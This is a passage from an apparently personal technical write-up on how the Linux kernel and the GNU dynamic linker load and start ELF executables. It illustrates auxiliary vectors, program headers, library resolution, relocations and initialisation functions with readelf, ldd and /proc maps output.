__libc_freeres_pt NOBITS           00000000007e1508  001d8760\n       0000000000000078  0000000000000000  WA       0     0     8\n  [27] .shstrtab         STRTAB      
     0000000000000000  001d8760\n       0000000000000134  0000000000000000           0     0     1\nKey to Flags:\n  W (write), A (alloc), X (execute), M (merge), S (strings), l (large)\n  I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)\n  O (extra OS processing required) o (OS specific), p (processor specific)\n
\n\n\n

The GDB info files command can be used to display the different sections of a\nprocess.

\n

Calling the program entry point

\n

The kernel then sets up the (first, main) stack for the process and calls the\nentry point of the program (located with the e_entry field of the ELF header).

\n

The stack of the process and its initial registers are used to pass\ninformation to the process such as:

\n\n

More information about the auxiliary vector can be found in man\ngetauxval and\nthe relevant specs. We can display the auxiliary vector at the startup\nof a dynamically-linked executable by setting LD_SHOW_AUXV=1 in\nits environment:

\n
$ LD_SHOW_AUXV=1 /bin/true\nAT_SYSINFO_EHDR: 0x7fffed9fc000\nAT_HWCAP:        bfebfbff\nAT_PAGESZ:       4096\nAT_CLKTCK:       100\nAT_PHDR:         0x400040\nAT_PHENT:        56\nAT_PHNUM:        9\nAT_BASE:         0x7f6ba3e9f000\nAT_FLAGS:        0x0\nAT_ENTRY:        0x401432\nAT_UID:          1000\nAT_EUID:         1000\nAT_GID:          1000\nAT_EGID:         1000\nAT_SECURE:       0\nAT_RANDOM:       0x7fffed8b92d9\nAT_EXECFN:       /bin/true\nAT_PLATFORM:     x86_64\n
\n\n\n

Auxiliary vector in the AMD-64 ABI

\n

For example, the System V ABI, AMD64 supplement\nspecifies in section 3.1 (Process Initialization) that the stack\ncontains:

\n\n

The corresponding strings are stored after this on the stack.

\n

Dynamic Binary

\n

When dynamic linking is involved, things are more complicated: the libraries\nmust be mapped in memory and the symbols must be resolved.

\n

The libraries must be able to be loaded anywhere in\nthe process virtual address space and must be relocated. The kernel maps not only\nthe program file in memory but the dynamic linker (a.k.a. the interpreter)\nas well, which must:

\n\n

This is a very high level overview as I understand it:

\n
    \n
  1. \n

    the kernel initialises the process:

    \n
      \n
    1. \n

      it maps the main program, the interpreter (dynamic linker)\n segments and the vDSO in the virtual address space;

      \n
    2. \n
    3. \n

      it sets up the stack (passing the arguments, environment) and\n calls the dynamic linker entry point;

      \n
    4. \n
    \n
  2. \n
  3. \n

    the dynamic linker loads the different ELF objects and binds them together

    \n
      \n
    1. \n

      it relocates itself (!);

      \n
    2. \n
    3. \n

      it finds and loads the necessary libraries;

      \n
    4. \n
    5. \n

      it does the relocations (which binds the ELF objects);

      \n
    6. \n
    7. \n

      it calls the initialisation functions of the shared objects;

      \n
    8. \n
    \n

    Those functions are specified in the DT_INIT and DT_INIT_ARRAY\n entries of the ELF objects.

    \n
      \n
    1. it calls the main program entry point;
    2. \n
    \n

    The main program entry point is found in the AT_ENTRY entry of the\n auxiliary vector: it has been initialised by the kernel from the e_entry\n ELF header field.

    \n
  4. \n
  5. \n

    the executable then initialises itself.

    \n
  6. \n
\n

Base address

\n

The shared objects are designed to be mapped anywhere in the virtual address\nspace without modification: the read-only segment is mapped unmodified in each\ninstance of the shared object and every instance of the library shares the same\nmemory pages for this segment. For this reason, the virtual addresses expressed\nin many ELF data structures (such as in the program headers) are expressed as\noffsets from the base address of the shared object (the address at which the\nshared object is mapped):

\n
$ readelf -l /lib/x86_64-linux-gnu/libc.so.6 | less\nElf file type is DYN (Shared object file)\nEntry point 0x21c50\nThere are 10 program headers, starting at offset 64\n\nProgram Headers:\nType           Offset             VirtAddr           PhysAddr\nFileSiz            MemSiz              Flags  Align\nPHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040\n0x0000000000000230 0x0000000000000230  R E    8\nINTERP         0x000000000016bfb0 0x000000000016bfb0 0x000000000016bfb0\n0x000000000000001c 0x000000000000001c  R      10\n[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\nLOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000\n0x000000000019e774 0x000000000019e774  R E    200000\nLOAD           0x000000000019f740 0x000000000039f740 0x000000000039f740\n0x0000000000004ff8 0x00000000000092e0  RW     200000\nDYNAMIC        0x00000000001a2ba0 0x00000000003a2ba0 0x00000000003a2ba0\n0x00000000000001e0 0x00000000000001e0  RW     8\nNOTE           0x0000000000000270 0x0000000000000270 0x0000000000000270\n0x0000000000000044 0x0000000000000044  R      4\nTLS            0x000000000019f740 0x000000000039f740 0x000000000039f740\n0x0000000000000010 0x0000000000000080  R      8\nGNU_EH_FRAME   0x000000000016bfcc 0x000000000016bfcc 0x000000000016bfcc\n0x0000000000006a24 0x0000000000006a24  R      4\nGNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n0x0000000000000000 0x0000000000000000  RW     10\nGNU_RELRO      0x000000000019f740 0x000000000039f740 0x000000000039f740\n0x00000000000038c0 0x00000000000038c0  R      1\n\nSection to Segment mapping:\nSegment Sections...\n00\n01     .interp\n02     .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_d .gnu.version_r .rela.dyn .rela.plt .plt .text __libc_freeres_fn __libc_thread_freeres_fn .rodata .interp .eh_frame_hdr .eh_frame .gcc_except_table .hash\n03     .tdata .init_array __libc_subfreeres __libc_atexit 
__libc_thread_subfreeres .data.rel.ro .dynamic .got .got.plt .data .bss\n04     .dynamic\n05     .note.gnu.build-id .note.ABI-tag\n06     .tdata .tbss\n07     .eh_frame_hdr\n08\n09     .tdata .init_array __libc_subfreeres __libc_atexit __libc_thread_subfreeres .data.rel.ro .dynamic .got\n
\n\n\n

In this example the second LOAD segment of the libc is mapped at\n0x000000000039f740 + base_address = 0x000000000039f740 + 0x7f69eab7a000:

\n
$ cat /proc/$(pgrep sleep)/maps\n00400000-00407000 r-xp 00000000 08:01 527401            /bin/sleep\n00606000-00607000 r--p 00006000 08:01 527401            /bin/sleep\n00607000-00608000 rw-p 00007000 08:01 527401            /bin/sleep\n0141f000-01440000 rw-p 00000000 00:00 0                 [heap]\n7f69eab7a000-7f69ead19000 r-xp 00000000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69ead19000-7f69eaf19000 ---p 0019f000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69eaf19000-7f69eaf1d000 r--p 0019f000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69eaf1d000-7f69eaf1f000 rw-p 001a3000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69eaf1f000-7f69eaf23000 rw-p 00000000 00:00 0\n7f69eaf23000-7f69eaf43000 r-xp 00000000 08:01 2625993   /lib/x86_64-linux-gnu/ld-2.19.so\n7f69eaf85000-7f69eb10e000 r--p 00000000 08:01 2245023   /usr/lib/locale/locale-archive\n7f69eb10e000-7f69eb111000 rw-p 00000000 00:00 0\n7f69eb141000-7f69eb143000 rw-p 00000000 00:00 0\n7f69eb143000-7f69eb144000 r--p 00020000 08:01 2625993   /lib/x86_64-linux-gnu/ld-2.19.so\n7f69eb144000-7f69eb145000 rw-p 00021000 08:01 2625993   /lib/x86_64-linux-gnu/ld-2.19.so\n7f69eb145000-7f69eb146000 rw-p 00000000 00:00 0\n7fffffeaa000-7fffffecb000 rw-p 00000000 00:00 0         [stack]\n7ffffff03000-7ffffff05000 r-xp 00000000 00:00 0         [vdso]\n7ffffff05000-7ffffff07000 r--p 00000000 00:00 0         [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n
\n\n\n

Some part of the second PT_LOAD segment is read-only: this is because of the\nPT_GNU_RELRO program header. This program header asks the dynamic linker to\nmark this part of the memory read-only after the relocation is done.

\n

Mapping the executable in memory

\n

As before, the kernel maps the executable in memory using the PT_LOAD entries:

\n
$ readelf -l /bin/bash\n\nElf file type is EXEC (Executable file)\nEntry point 0x4205bc\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001f8 0x00000000000001f8  R E    8\n  INTERP         0x0000000000000238 0x0000000000400238 0x0000000000400238\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x00000000000f1a74 0x00000000000f1a74  R E    200000\n  LOAD           0x00000000000f1de0 0x00000000006f1de0 0x00000000006f1de0\n                 0x0000000000009068 0x000000000000f298  RW     200000\n  DYNAMIC        0x00000000000f1df8 0x00000000006f1df8 0x00000000006f1df8\n                 0x0000000000000200 0x0000000000000200  RW     8\n  NOTE           0x0000000000000254 0x0000000000400254 0x0000000000400254\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x00000000000d6af0 0x00000000004d6af0 0x00000000004d6af0\n                 0x000000000000407c 0x000000000000407c  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x00000000000f1de0 0x00000000006f1de0 0x00000000006f1de0\n                 0x0000000000000220 0x0000000000000220  R      1\n\n Section to Segment mapping:\n  Segment Sections...\n   00\n   01     .interp\n   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame\n   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss\n   04     
.dynamic\n   05     .note.ABI-tag .note.gnu.build-id\n   06     .eh_frame_hdr\n   07\n   08     .init_array .fini_array .jcr .dynamic .got\n
\n\n\n

Finding the interpreter and running the interpreter

\n

Finding the interpreter

\n

The location of the dynamic linker (also called the interpreter) to\nuse is hard-coded in the executable: the PT_INTERP entry in the\nprogram headers defines the location of this string in the executable\nfile and in the process virtual address space.

\n
$ readelf -l /bin/bash\n\nElf file type is EXEC (Executable file)\nEntry point 0x4205bc\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001f8 0x00000000000001f8  R E    8\n[...]\n\n Section to Segment mapping:\n  Segment Sections...\n   00\n   01     .interp\n[...]\n
\n\n\n

Mapping the interpreter

\n

The dynamic linker (/lib64/ld-linux-x86-64.so.2) is mapped by the kernel in\nthe virtual address space of the process (using the PT_LOAD entries):

\n
$ readelf -l /lib64/ld-linux-x86-64.so.2\n\nElf file type is DYN (Shared object file)\nEntry point 0x1190\nThere are 7 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x000000000001fe08 0x000000000001fe08  R E    200000\n  LOAD           0x0000000000020c00 0x0000000000220c00 0x0000000000220c00\n                 0x00000000000013e4 0x00000000000015a8  RW     200000\n  DYNAMIC        0x0000000000020e70 0x0000000000220e70 0x0000000000220e70\n                 0x0000000000000170 0x0000000000000170  RW     8\n  NOTE           0x00000000000001c8 0x00000000000001c8 0x00000000000001c8\n                 0x0000000000000024 0x0000000000000024  R      4\n  GNU_EH_FRAME   0x000000000001d440 0x000000000001d440 0x000000000001d440\n                 0x000000000000064c 0x000000000000064c  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x0000000000020c00 0x0000000000220c00 0x0000000000220c00\n                 0x0000000000000400 0x0000000000000400  R      1\n\n Section to Segment mapping:\n  Segment Sections...\n   00     .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_d .rela.dyn .rela.plt .plt .text .rodata .eh_frame_hdr .eh_frame\n   01     .data.rel.ro .dynamic .got .got.plt .data .bss\n   02     .dynamic\n   03     .note.gnu.build-id\n   04     .eh_frame_hdr\n   05\n   06     .data.rel.ro .dynamic .got\n
\n\n\n

Calling the interpreter

\n

Now the kernel calls the entry point of the dynamic linker located by the\ne_entry field of its ELF header with the arguments, environment and auxiliary\nvector:

\n
$ readelf -h /lib64/ld-linux-x86-64.so.2\nELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n  Data:                              2's complement, little endian\n  Version:                           1 (current)\n  OS/ABI:                            UNIX - System V\n  ABI Version:                       0\n  Type:                              DYN (Shared object file)\n  Machine:                           Advanced Micro Devices X86-64\n  Version:                           0x1\n  Entry point address:               0x1190\n  Start of program headers:          64 (bytes into file)\n  Start of section headers:          139456 (bytes into file)\n  Flags:                             0x0\n  Size of this header:               64 (bytes)\n  Size of program headers:           56 (bytes)\n  Number of program headers:         7\n  Size of section headers:           64 (bytes)\n  Number of section headers:         23\n  Section header string table index: 22\n
\n\n\n

The auxiliary vector contains information which will be used by the\ndynamic linker, and the libc. Some interesting values for the\ndynamic linker are:

\n\n

AT_PHDR can be used to find the base address of the executable with:

\n
// Simplified code from the GNU dynamic linker source code:\nfor (ph = phdr; ph < &phdr[phnum]; ++ph)\n  if (ph->p_type == PT_PHDR)\n    main_map->l_addr = (ElfW(Addr)) phdr - ph->p_vaddr;\n
\n\n\n

Here are some values for a given process:

\n
$ LD_SHOW_AUXV=1 /bin/bash -c \"unset LD_SHOW_AUXV; sleep 100000\"\nAT_SYSINFO_EHDR: 0x7fff5cbfc000\nAT_HWCAP:        bfebfbff\nAT_PAGESZ:       4096\nAT_CLKTCK:       100\nAT_PHDR:         0x400040\nAT_PHENT:        56\nAT_PHNUM:        9\nAT_BASE:         0x7ffdd94ce000\nAT_FLAGS:        0x0\nAT_ENTRY:        0x4205bc\nAT_UID:          1000\nAT_EUID:         1000\nAT_GID:          1000\nAT_EGID:         1000\nAT_SECURE:       0\nAT_RANDOM:       0x7fff5ca4ddf9\nAT_EXECFN:       /bin/bash\nAT_PLATFORM:     x86_64\n
\n\n\n

We can see that the AT_BASE field is the base address of the dynamic linker\nand that AT_PHDR points at the beginning of the executable mapping:

\n
$ cat /proc/10130/maps\n00400000-004f2000 r-xp 00000000 08:11 526344            /bin/bash\n006f1000-006f2000 r--p 000f1000 08:11 526344            /bin/bash\n006f2000-006fb000 rw-p 000f2000 08:11 526344            /bin/bash\n006fb000-00702000 rw-p 00000000 00:00 0\n01729000-01738000 rw-p 00000000 00:00 0                 [heap]\n7ffdd8ad2000-7ffdd8c71000 r-xp 00000000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8c71000-7ffdd8e71000 ---p 0019f000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8e71000-7ffdd8e75000 r--p 0019f000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8e75000-7ffdd8e77000 rw-p 001a3000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8e77000-7ffdd8e7b000 rw-p 00000000 00:00 0\n7ffdd8e7b000-7ffdd8e7e000 r-xp 00000000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd8e7e000-7ffdd907d000 ---p 00003000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd907d000-7ffdd907e000 r--p 00002000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd907e000-7ffdd907f000 rw-p 00003000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd907f000-7ffdd90a5000 r-xp 00000000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd90a5000-7ffdd92a4000 ---p 00026000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd92a4000-7ffdd92a8000 r--p 00025000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd92a8000-7ffdd92a9000 rw-p 00029000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd92a9000-7ffdd92cd000 r-xp 00000000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd92cd000-7ffdd94cc000 ---p 00024000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd94cc000-7ffdd94cd000 r--p 00023000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd94cd000-7ffdd94ce000 rw-p 00024000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd94ce000-7ffdd94ee000 r-xp 00000000 08:11 1192269   
/lib/x86_64-linux-gnu/ld-2.19.so\n7ffdd951c000-7ffdd96a7000 r--p 00000000 08:11 787456    /usr/lib/locale/locale-archive\n7ffdd96a7000-7ffdd96ab000 rw-p 00000000 00:00 0\n7ffdd96e5000-7ffdd96ec000 r--s 00000000 08:11 1192265   /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache\n7ffdd96ec000-7ffdd96ee000 rw-p 00000000 00:00 0\n7ffdd96ee000-7ffdd96ef000 r--p 00020000 08:11 1192269   /lib/x86_64-linux-gnu/ld-2.19.so\n7ffdd96ef000-7ffdd96f0000 rw-p 00021000 08:11 1192269   /lib/x86_64-linux-gnu/ld-2.19.so\n7ffdd96f0000-7ffdd96f1000 rw-p 00000000 00:00 0\n7fff5ca2f000-7fff5ca50000 rw-p 00000000 00:00 0         [stack]\n7fff5cbfc000-7fff5cbfe000 r-xp 00000000 00:00 0         [vdso]\n7fff5cbfe000-7fff5cc00000 r--p 00000000 00:00 0         [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n
\n\n\n

Q: why is there a gap in the dynamic linker mapping?

\n

Library resolution

\n

The dynamic linker locates and maps all the required shared objects in\nthe process virtual address space. Each ELF shared object declares the\nlibraries it depends on with DT_NEEDED entries in the dynamic\nsection.

\n

The PT_DYNAMIC program header locates the position of the dynamic\n(.dynamic) section in the file and in the virtual address space of\nthe process (as an offset from the base address of the ELF object).

\n
$ readelf -l /bin/bash\n\nElf file type is EXEC (Executable file)\nEntry point 0x4205bc\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n[...]\n  DYNAMIC        0x00000000000f1df8 0x00000000006f1df8 0x00000000006f1df8\n                 0x0000000000000200 0x0000000000000200  RW     8\n[...]\n\n Section to Segment mapping:\n  Segment Sections...\n[...]\n   04     .dynamic\n[...]\n
\n\n\n

The content of the dynamic section can be shown by readelf -d:

\n
$ readelf -d /bin/bash\n\nDynamic section at offset 0xf1df8 contains 27 entries:\n  Tag        Type                         Name/Value\n 0x0000000000000001 (NEEDED)             Shared library: [libncurses.so.5]\n 0x0000000000000001 (NEEDED)             Shared library: [libtinfo.so.5]\n 0x0000000000000001 (NEEDED)             Shared library: [libdl.so.2]\n 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]\n 0x000000000000000c (INIT)               0x41d570\n 0x000000000000000d (FINI)               0x4b7f34\n 0x0000000000000019 (INIT_ARRAY)         0x6f1de0\n 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)\n 0x000000000000001a (FINI_ARRAY)         0x6f1de8\n 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)\n 0x000000006ffffef5 (GNU_HASH)           0x400298\n 0x0000000000000005 (STRTAB)             0x4121f8\n 0x0000000000000006 (SYMTAB)             0x404b30\n 0x000000000000000a (STRSZ)              35877 (bytes)\n 0x000000000000000b (SYMENT)             24 (bytes)\n 0x0000000000000015 (DEBUG)              0x0\n 0x0000000000000003 (PLTGOT)             0x6f2000\n 0x0000000000000002 (PLTRELSZ)           5112 (bytes)\n 0x0000000000000014 (PLTREL)             RELA\n 0x0000000000000017 (JMPREL)             0x41c178\n 0x0000000000000007 (RELA)               0x41c0b8\n 0x0000000000000008 (RELASZ)             192 (bytes)\n 0x0000000000000009 (RELAENT)            24 (bytes)\n 0x000000006ffffffe (VERNEED)            0x41c008\n 0x000000006fffffff (VERNEEDNUM)         2\n 0x000000006ffffff0 (VERSYM)             0x41ae1e\n 0x0000000000000000 (NULL)               0x0\n
\n\n\n

The dynamic section declares each shared object dependency as a\nDT_NEEDED entry. The dynamic linker (transitively) finds all those\nDT_NEEDED entries and maps the corresponding shared object in the\nprocess virtual address space:

\n

If the DT_NEEDED entry contains a /, it is treated as a path name.

\n

Otherwise, the file is searched in the following locations:

\n\n

A suffix can be added after each of those paths based on the processor\ncapabilities. For example, /lib/i386-linux-gnu/i686/cmov/ for a processor\nwith support for i686 features and the cmov (Conditional Move) instructions.

\n

The libraries specified in LD_PRELOAD (and their dependencies) are loaded as\nwell using the same algorithm.

\n

The ldd tool can be used to find all the ELF objects loaded by the dynamic\nlinker:

\n
$ ldd /bin/bash\n  linux-vdso.so.1 (0x00007fff88bfc000)\n  libncurses.so.5 => /lib/x86_64-linux-gnu/libncurses.so.5 (0x00007f6a58816000)\n  libtinfo.so.5 => /lib/x86_64-linux-gnu/libtinfo.so.5 (0x00007f6a585ec000)\n  libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f6a583e7000)\n  libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a5803e000)\n  /lib64/ld-linux-x86-64.so.2 (0x00007f6a58a6c000)\n
\n\n\n

Symbols

\n

The dynamic linker uses symbols to link ELF objects together:

\n\n

The .dynsym section (found under DT_SYMTAB in the dynamic section)\ncontains the list of symbols (imported as well as exported) necessary\nat runtime:

\n\n
$ readelf -s /bin/bash\n\nSymbol table '.dynsym' contains 2291 entries:\n   Num:    Value          Size Type    Bind   Vis      Ndx Name\n     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND\n     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND endgrent@GLIBC_2.2.5 (2)\n     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (3)\n     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND iswlower@GLIBC_2.2.5 (2)\n[...]\n    17: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterTMCloneTab\n[...]\n  1682: 00000000006fae48     0 NOTYPE  GLOBAL DEFAULT   25 __bss_start\n[...]\n  2283: 00000000004ccd10    16 OBJECT  GLOBAL DEFAULT   15 true_doc\n  2284: 0000000000496b00   165 FUNC    GLOBAL DEFAULT   13 mbsmbchar\n  2285: 00000000004764c0    47 FUNC    GLOBAL DEFAULT   13 sh_wrerror\n  2286: 00000000004491e0    18 FUNC    GLOBAL DEFAULT   13 restore_pgrp_pipe\n  2287: 00000000006f2e80     4 OBJECT  GLOBAL DEFAULT   24 interactive_comments\n  2288: 00000000004b5a40   490 FUNC    GLOBAL DEFAULT   13 tilde_expand_word\n  2289: 0000000000460600   307 FUNC    GLOBAL DEFAULT   13 array_shift\n  2290: 0000000000700bcc     4 OBJECT  GLOBAL DEFAULT   25 history_lines_this_sessio\n
\n\n\n

More information about the different fields of the symbol\ntable is in the appendix.

\n

Relocation

\n

A given ELF object defines some symbols and imports/uses some others. The\ndynamic linker needs to connect those references by placing the value of the\nsymbols (typically the effective address of the referenced variable/function)\nwhere the ELF object expects to find it. This process of resolving the symbol\nreferences is called relocation.

\n

The relocation tables can be shown by readelf -r:

\n
$ readelf -r /bin/bash\nRelocation section '.rela.dyn' at offset 0x1c0b8 contains 8 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n0000006f1ff8  006800000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0\n0000006fae80  01a100000005 R_X86_64_COPY     00000000006fae80 stdout + 0\n0000006fae88  07de00000005 R_X86_64_COPY     00000000006fae88 stdin + 0\n0000006fae90  06bc00000005 R_X86_64_COPY     00000000006fae90 UP + 0\n0000006fae98  01e200000005 R_X86_64_COPY     00000000006fae98 __environ + 0\n0000006faea0  060100000005 R_X86_64_COPY     00000000006faea0 PC + 0\n0000006faec0  042700000005 R_X86_64_COPY     00000000006faec0 BC + 0\n0000006faec8  06e400000005 R_X86_64_COPY     00000000006faec8 stderr + 0\n\nRelocation section '.rela.plt' at offset 0x1c178 contains 213 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n0000006f2018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 endgrent + 0\n0000006f2020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 __ctype_toupper_loc + 0\n0000006f2028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 iswlower + 0\n0000006f2030  000400000007 R_X86_64_JUMP_SLO 0000000000000000 sigprocmask + 0\n0000006f2038  000500000007 R_X86_64_JUMP_SLO 0000000000000000 __snprintf_chk + 0\n0000006f2040  000600000007 R_X86_64_JUMP_SLO 0000000000000000 getservent + 0\n0000006f2048  000700000007 R_X86_64_JUMP_SLO 0000000000000000 wcscmp + 0\n0000006f2050  000800000007 R_X86_64_JUMP_SLO 0000000000000000 putchar + 0\n[...]\n
\n\n\n

Each .rela.foo section defines relocations for the corresponding .foo\nsection:

\n\n

An entry in those tables is defined as:

\n
typedef struct\n{\n  ElfXX_Addr    r_offset;   /* Address */\n  ElfXX_Xword   r_info;     /* Relocation type and symbol index */\n  ElfXX_Sxword  r_addend;   /* Addend */\n} ElfXX_Rela;\n
\n\n\n

The fields of this table are:

\n\n

The dynamic linker finds the relocation table with the DT_RELA (base address\nof the relocations) and DT_RELASZ (size in bytes) entries of the dynamic section:\nthis is usually the .rela.dyn section. The dynamic linker\napplies all those relocations in all loaded objects.

\n

Another relocation table can be applied lazily, on demand (lazy binding). Those\nrelocations are indicated with DT_JMPREL (base address) and DT_PLTRELSZ (size):\nthis is usually the .rela.plt section. Those relocations are usually deferred\n(unless lazy binding is disabled by setting LD_BIND_NOW) in order to speed up\nthe initialisation of the program.

\n

Initialisation functions

\n

The dynamic linker then calls the initialisation functions of the shared objects.\nEach function is passed the argc, argv and envp parameters.

\n

They are found and executed with (in this order)

\n\n

The constructors of all dependencies of a shared object are called before the\nconstructor of this shared object.

\n

The initialisation functions of the executable are not called by the dynamic\nlinker but by the __libc_csu_init function (for the GNU libc), a part of the\nlibc which is statically linked into the executable:

\n

Q: what does CSU mean?

\n
const size_t size = __init_array_end - __init_array_start;\nfor (size_t i = 0; i < size; i++)\n  (*__init_array_start [i]) (argc, argv, envp);\n
\n\n\n

The preinitialisation functions of the executable, however, are called by the\ndynamic linker.

\n

See the appendix for how to define initialisation functions.

\n

Entry point

\n

The dynamic linker then calls the entry point specified in the ELF header of the\nexecutable.

\n

In our bash example, we can check that this entry point is in the .text\nsection and is the _start function (in the symbol table):

\n
$ readelf -h /bin/bash\nELF Header:\n  [...]\n  Entry point address:               0x4205bc\n  [...]\n\n$ readelf -S /bin/bash\nThere are 27 section headers, starting at offset 0xfaf38:\n\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n[...]\n  [13] .text             PROGBITS         000000000041e2f0  0001e2f0\n       0000000000099c42  0000000000000000  AX       0     0     16\n[...]\n\n$ readelf -s /bin/bash\nSymbol table '.dynsym' contains 2291 entries:\n   Num:    Value          Size Type    Bind   Vis      Ndx Name\n[...]\n  1726: 00000000004205bc     0 FUNC    GLOBAL DEFAULT   13 _start\n
\n\n\n

Program startup

\n

The rest of the initialisation process is not done by the dynamic linker\nanymore:

\n
    \n
  1. \n

    _start calls the libc\n __libc_start_main;

    \n
  2. \n
  3. \n

    __libc_start_main calls the executable __libc_csu_init (statically-linked\n part of the libc);

    \n
  4. \n
  5. \n

    __libc_csu_init calls the executable constructors (and other initialisations);

    \n
  6. \n
  7. \n

    __libc_start_main calls the executable main();

    \n
  8. \n
  9. \n

    __libc_start_main calls the executable exit().

    \n
  10. \n
\n

However, the dynamic linker can still be used later for two reasons:

\n\n

Conclusion

\n

Advanced topics not covered here:

\n\n

Appendix: more details

\n

Symbol fields

\n

Symbols have an associated type, such as STT_FUNC for functions and\nSTT_OBJECT for data.

\n

The Ndx field is the number of the section the symbol is in.

\n

The @ thingie in the symbol names is related to symbol versioning which is an\nextension.

\n

Binding

\n

The binding is used by the static linker and defines how the symbols are\nvisible across different .o files of the same final object:

\n\n
void  __attribute__((weak)) foo(void) {}\n
\n\n\n

Visibility

\n

The visibility defines the visibility of the symbol for the dynamic linker:

\n\n

In GCC the default visibility can be\nchanged\nwith -fvisibility=hidden for a given file and can be changed on a\nper-symbol basis with the visibility attribute:

\n
void  __attribute__((visibility(\"default\"))) foo(void) {}\n
\n\n\n

Initialisation (and preinitialisation) functions

\n
void pre_init() {\n  abort();\n}\n\nvoid (*const preinit_array []) (void)\n     __attribute__ ((section (\".preinit_array\"),\n             aligned (sizeof (void *)))) =\n{\n  &pre_init\n};\n\n__attribute__((constructor))\nint init() {\n  abort();\n}\n
\n\n\n

Appendix: dynamic loading and dynamic symbol resolution

\n

The functions related to dynamic loading of libraries (dlopen()) and\ndynamic symbol resolution (dlsym()) are implemented in libdl.so.\nThe loading and linking of ELF shared objects and the resolution of\nthe symbols are handled by the dynamic linker: libdl.so delegates\nmost of its job to the dynamic linker.

\n

dlopen()

\n

This is the core of the GNU dlopen() (in dlfcn/dlopen.c):

\n
